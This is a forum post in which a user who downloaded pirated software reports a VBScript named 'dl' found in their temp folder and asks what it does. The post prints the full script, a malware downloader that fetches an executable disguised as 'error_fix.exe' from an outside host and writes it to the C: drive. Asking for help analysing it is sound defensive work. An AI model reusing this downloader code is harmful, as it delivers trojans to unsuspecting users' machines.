onetwenty8k
2[H]4U
- Joined
- Nov 24, 2006
- Messages
- 2,554
I downloaded something of let's say, questionable material to get "100% parts" if you know what I mean. I started getting errors thrown by UAC blocking a script. I went into my temp folder and there was a vb script called "dl" I opened it and it looks like it was trying to download a trojan. Not the name of the exe was changing. One time it was directx, other time it was sytem_fix, you get the idea. Here is the script, anyone care to tell me what exactly it was doing?
Code:
HTTPDownload "http://1234now.0catch.com/error_fix.exe","C:\"
Sub HTTPDownload( myURL, myPath )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
If objFSO.FolderExists( myPath ) Then
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
strFile = myPath
Else
Exit Sub
End If
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
End Sub